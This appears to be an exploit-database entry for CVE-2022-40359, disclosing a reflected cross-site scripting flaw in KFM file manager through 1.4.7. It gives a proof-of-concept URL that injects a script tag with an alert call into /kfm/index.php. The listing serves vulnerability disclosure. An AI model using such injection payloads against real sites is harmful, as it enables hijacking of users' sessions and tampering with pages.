Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2022-40359 | CWE-79 | N/A | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
kfm-kae-039 | High | Remote | 2022-09-22 |
# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS) # Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com' # Vendor Homepage: https://code.google.com/archive/p/kfm/downloads # Software Link: https://code.google.com/archive/p/kfm/downloads # Version: ALL # Tested on: Linux, Windows # CVE : CVE-2022-40359 Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. Visit PoC URL in browser https://{URL]/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E
Copyright ©2024 Exploitalert.